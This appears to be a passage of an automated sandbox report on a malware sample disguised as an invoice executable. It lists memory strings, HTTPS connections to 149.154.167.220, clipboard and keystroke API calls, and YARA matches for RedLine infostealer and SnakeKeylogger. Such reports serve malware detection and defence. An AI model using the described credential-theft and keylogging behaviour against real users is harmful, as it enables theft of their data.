              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: svchost.exe, 0000000B.00000002.2547860084.0000000005924000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005955000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000058F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: svchost.exe, 0000000B.00000002.2547860084.000000000591F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000058F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
              Source: svchost.exe, 00000008.00000002.2547584481.00000000056E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005592000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005592000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: svchost.exe, 00000008.00000002.2547584481.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.000000000580B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.1898
              Source: svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.orgch8
              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: svchost.exe, 0000000B.00000002.2547860084.0000000005955000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: svchost.exe, 0000000B.00000002.2547860084.0000000005946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49899 version: TLS 1.2
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_004E6B0C
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_004E6D07
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00926D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00926D07
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_004E6B0C
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,3_2_004D2B37

              System Summary

              barindex
              Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 6.2.juvenile.exe.3da0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 10.2.juvenile.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 11.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000000B.00000002.2543748879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000008.00000002.2543753566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000002.1322250001.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000000A.00000002.1448696408.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: This is a third-party compiled AutoIt script.3_2_00493D19
              Source: FACT0987789000900.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: FACT0987789000900.exe, 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bd2bf540-0
              Source: FACT0987789000900.exe, 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: LSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d3ae1f30-6
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: This is a third-party compiled AutoIt script.6_2_008D3D19
              Source: juvenile.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: juvenile.exe, 00000006.00000002.1320568116.000000000097E000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d29ce00d-c
              Source: juvenile.exe, 00000006.00000002.1320568116.000000000097E000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_29c24b77-2
